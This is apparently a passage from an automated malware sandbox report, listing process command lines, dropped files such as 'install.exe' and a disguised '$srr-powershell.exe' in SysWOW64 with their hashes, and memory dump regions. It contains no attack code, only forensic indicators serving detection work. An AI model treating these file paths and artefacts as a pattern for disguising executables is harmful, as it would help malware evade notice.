      command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x238,0x23c,0x240,0x234,0x2ac,0x7ffadb592e98,0x7ffadb592ea4,0x7ffadb592eb0
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2376 --field-trial-handle=2180,i,12780723798465539942,12010519452607841069,262144 --variations-seed-version /prefetch:3
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4156 --field-trial-handle=2180,i,12780723798465539942,12010519452607841069,262144 --variations-seed-version /prefetch:8
C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Windows\system32\wbem\wmiprvse.exe
  command line: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Windows\servicing\TrustedInstaller.exe
  command line: C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Windows\System32\mousocoreworker.exe
  command line: C:\Windows\System32\mousocoreworker.exe -Embedding
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize 9KB
MD5 b5b727bd7aa28bf392145fcc332f240e
SHA1 069a52e538f0c703657490a18f967d94c5744276
SHA256 6cccace7dbdb020385c2433d6e301fd06115077f9e41c22719bcbec18bbdac57
SHA512 e2a2b60bd1e34fea11e7b7ca3b637369a46eef63f79321672420658f4236aba6d27a56e035eefd1b1a40288b7f9b89713036ad67f4a6c88154b5a60a89e57f62
-
C:\Users\Admin\AppData\Local\Temp\install.exe
Filesize 162KB
MD5 152e3f07bbaf88fb8b097ba05a60df6e
SHA1 c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256 a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA512 2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
C:\Windows\SysWOW64\Windows\$srr-powershell.exe
Filesize 409KB
MD5 ca46bdb39ae5def0cbcb622d2daf18ee
SHA1 e4fade184792a622eecbb60e6e10affd9b1f9625
SHA256 ffb2649845e8ebbf318b01537f3bf87fa2f3ae48a0cc5109985abbfa7e2d4bce
SHA512 01d8ad45700c3a24a48806256a571e239f3d76c58820a9dfbea0d5a8429e0abd965e1ce16e5e8fc275b8b9769be44a987ed3caac7da313729221ec43c073ee0c
-
C:\Windows\Temp\__PSScriptPolicyTest_eyeiv3ui.osv.ps1
Filesize 60B
MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/612-49-0x00000245BDA40000-0x00000245BDA6B000-memory.dmp  Filesize 172KB
-
memory/612-50-0x00000245BDA40000-0x00000245BDA6B000-memory.dmp  Filesize 172KB
-
memory/612-56-0x00000245BDA40000-0x00000245BDA6B000-memory.dmp  Filesize 172KB
-
memory/612-57-0x00007FFAC3530000-0x00007FFAC3540000-memory.dmp  Filesize 64KB
-
memory/612-48-0x00000245BDA10000-0x00000245BDA35000-memory.dmp  Filesize 148KB
-
memory/668-67-0x00000265E8EA0000-0x00000265E8ECB000-memory.dmp  Filesize 172KB
-
memory/668-68-0x00007FFAC3530000-0x00007FFAC3540000-memory.dmp  Filesize 64KB
-
memory/668-61-0x00000265E8EA0000-0x00000265E8ECB000-memory.dmp  Filesize 172KB
-
memory/764-24-0x0000021806360000-0x0000021806382000-memory.dmp  Filesize 136KB
-
memory/764-34-0x000002181EB40000-0x000002181EB6A000-memory.dmp  Filesize 168KB
-
memory/764-36-0x00007FFB02100000-0x00007FFB021BE000-memory.dmp  Filesize 760KB
-
memory/764-35-0x00007FFB034B0000-0x00007FFB036A5000-memory.dmp  Filesize 2.0MB
-
memory/940-72-0x000002B397BA0000-0x000002B397BCB000-memory.dmp  Filesize 172KB
-
memory/940-79-0x00007FFAC3530000-0x00007FFAC3540000-memory.dmp  Filesize 64KB
-
memory/940-78-0x000002B397BA0000-0x000002B397BCB000-memory.dmp  Filesize 172KB
-
memory/1016-83-0x0000024501AF0000-0x0000024501B1B000-memory.dmp  Filesize 172KB
-
memory/1016-90-0x00007FFAC3530000-0x00007FFAC3540000-memory.dmp  Filesize 64KB
-
memory/1016-89-0x0000024501AF0000-0x0000024501B1B000-memory.dmp  Filesize 172KB
-
memory/1044-94-0x0000016B704D0000-0x0000016B704FB000-memory.dmp  Filesize 172KB
-
memory/1060-40-0x0000000140000000-0x0000000140008000-memory.dmp  Filesize 32KB
-
memory/1060-37-0x0000000140000000-0x0000000140008000-memory.dmp  Filesize 32KB
-
memory/1060-42-0x0000000140000000-0x0000000140008000-memory.dmp  Filesize 32KB
-
memory/1060-44-0x00007FFB02100000-0x00007FFB021BE000-memory.dmp  Filesize 760KB
-
memory/1060-43-0x00007FFB034B0000-0x00007FFB036A5000-memory.dmp  Filesize 2.0MB
-
memory/1060-45-0x0000000140000000-0x0000000140008000-memory.dmp  Filesize 32KB
-
memory/1060-39-0x0000000140000000-0x0000000140008000-memory.dmp  Filesize 32KB
-
memory/1060-38-0x0000000140000000-0x0000000140008000-memory.dmp  Filesize 32KB
-
memory/2196-16-0x0000000075280000-0x0000000075A30000-memory.dmp  Filesize 7.7MB
-
memory/2196-33-0x0000000006200000-0x000000000620A000-memory.dmp  Filesize 40KB
-
memory/2196-744-0x0000000075280000-0x0000000075A30000-memory.dmp  Filesize 7.7MB
-
memory/2196-743-0x0000000075280000-0x0000000075A30000-memory.dmp  Filesize 7.7MB
-
memory/2196-15-0x0000000075280000-0x0000000075A30000-memory.dmp  Filesize 7.7MB
-
memory/4580-7-0x0000000006630000-0x0000000006642000-memory.dmp  Filesize 72KB
-
memory/4580-8-0x0000000006A70000-0x0000000006AAC000-memory.dmp  Filesize 240KB
-
memory/4580-14-0x0000000075280000-0x0000000075A30000-memory.dmp  Filesize 7.7MB
-
memory/4580-6-0x0000000005A60000-0x0000000005AC6000-memory.dmp  Filesize 408KB
-
memory/4580-5-0x0000000075280000-0x0000000075A30000-memory.dmp  Filesize 7.7MB
-
memory/4580-4-0x00000000055A0000-0x0000000005632000-memory.dmp  Filesize 584KB
-
memory/4580-3-0x0000000005B50000-0x00000000060F4000-memory.dmp  Filesize 5.6MB
-
memory/4580-2-0x000000007528E000-0x000000007528F000-memory.dmp  Filesize 4KB
-
memory/4580-0-0x000000007528E000-0x000000007528F000-memory.dmp  Filesize 4KB
-
memory/4580-22-0x0000000075280000-0x0000000075A30000-memory.dmp  Filesize 7.7MB
-
memory/4580-1-0x0000000000AB0000-0x0000000000B1C000-memory.dmp  Filesize 432KB